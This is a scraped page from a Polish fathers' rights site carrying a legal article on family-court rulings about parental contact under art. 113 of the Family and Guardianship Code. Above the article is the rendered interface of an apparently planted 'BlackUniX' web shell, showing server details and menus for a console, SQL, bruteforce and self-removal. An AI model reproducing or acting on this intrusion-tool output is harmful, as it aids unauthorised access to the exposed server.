W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-23 11:31:03
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.104.202
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Najciemniej pod latarnią czyli judykatura polskich sądów rodzinnych
04.02.2007.
Kodeks rodzinny i opiekuńczy traktuje interwencję w sferę osobistej styczności rodziców z dzieckiem jako środek ostateczny. Nawet pozbawienie władzy rodzicielskiej nie ma wpływu na tę styczność. Chyba że sąd jej zakaże, jeśli uzna, że wymaga tego dobro dziecka (art. 113 § 1) .
Ograniczenie osobistej styczności możliwe jest zaś tylko wtedy, gdy władza rodzicielska została ograniczona przez umieszczenie dziecka w rodzinie zastępczej lub w placówce opiekuńczo-wychowawczej (art. 113 § 2) . W innych sytuacjach jest to niemożliwe.

Kontakty rodziców z dziećmi

Najciemniej pod latarnią czyli judykatura polskich sądów rodzinnych

Kodeks rodzinny i opiekuńczy traktuje interwencję w sferę osobistej styczności rodziców z dzieckiem jako środek ostateczny. Nawet pozbawienie władzy rodzicielskiej nie ma wpływu na tę styczność. Chyba że sąd jej zakaże, jeśli uzna, że wymaga tego dobro dziecka (art. 113 § 1) . Ograniczenie osobistej styczności możliwe jest zaś tylko wtedy, gdy władza rodzicielska została ograniczona przez umieszczenie dziecka w rodzinie zastępczej lub w placówce opiekuńczo-wychowawczej (art. 113 § 2) . W innych sytuacjach jest to niemożliwe. A i w tej tylko "w wyjątkowych wypadkach". Inaczej też niż w sytuacji przewidzianej w § 1, sąd nie musi owej styczności ograniczać, ma tylko taką możliwość.

Przytoczone regulacje są jedynymi, które expressis verbis dotyczą osobistej styczności z dzieckiem. Tylko tu zawarte są przesłanki jej pozbawienia lub ograniczenia. W żadnym stopniu podstawą do jakiejkolwiek ingerencji w osobistą styczność nie jest art. 58 § 1, 97 § 2, 106 i 107 k. r. o. ani art. 443 § 1 kodeksu postępowania cywilnego. Wszystkie one dotyczą bowiem władzy rodzicielskiej, nie osobistej styczności. Wbrew pozorom odnosi się to też do art. 109 k. r. o. Zwłaszcza porównanie jego § 2 pkt 5 z art. 113 § 2 świadczy, że art. 109 nie legitymuje do jakiejkolwiek ingerencji w sferę osobistej styczności z dzieckiem. Art. 113 nie pozostawia więc cienia wątpliwości: osobista styczność, choć bezcenna w trakcie wykonywania władzy rodzicielskiej, cząstką tej władzy nie jest. Jest prawem samoistnym. Potwierdza to nadto brzmienie art. 579 zd. 1 k. p. c.

Z takiej perspektywy należy jednoznacznie ocenić kilkunastoletnią judykaturę polskich sądów rodzinnych. Zarówno w sprawach rozwodowych, jak i dotyczących wykonywania władzy rodzicielskiej przez rodziców separowanych lub nie będących małżonkami wydawane są werdykty określające czas i sposób osobistej styczności jednego z rodziców z dzieckiem. Orzeczenia takie zapadają nawet, gdy brak jakichkolwiek przesłanek powierzenia władzy rodzicielskiej jednemu zrodziców, z równoczesnym ograniczeniem władzy drugiego. Prawie nikt z sędziów nie zauważył, że art. 58 § 1 zd. 2 k. r. o. przewiduje tylko taką możliwość, nie jest to więc wymóg obligatoryjny. Nic nie stoi na przeszkodzie, aby w razie rozwodu nie dokonywać żadnych ingerencji w sferę władzy rodzicielskiej rozwodzących się małżonków. Rozstrzygnięcie przewidziane w art. 58 § 1 zd. 1 może bowiem polegać na potwierdzeniu dotychczasowego status iuris. Takie werdykty są niestety rzadkością. A nadinterpretacja, której dokonują sądy, rozstrzygając także o osobistej styczności, jest już ewidentnie contra legem. I to bez względu na ewentualne zgodne wnioski stron.

Osobista styczność z dzieckiem stanowi obszar dramatycznych i jak dotąd nierozwiązywalnych konfliktów. Przed kilkoma laty Senat przedstawił projekt przepisu, który mógł być antidotum na owe zagrożenia. Niestety, postulat ten przepadł na forum Sejmu. Dalej więc sytuacja jest patowa, krzywdząca rodziców i będąca zaczynem poważnych sporów między dorosłymi sprawującymi rodzicielską pieczę. Najwięcej tracą na tym dzieci, które dzięki pasywności prawodawcy i bezprawnym praktykom orzeczniczym są okaleczane w sferze emocjonalnej i pozbawiane elementarnego prawa do więzi z tymi, od których wzięły życie.

Janina Zaporowska - notariusz we Wrocławiu
Jacek Mazurkiewicz - właściciel kancelarii prawnej we Wrocławiu
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
23.07.2018.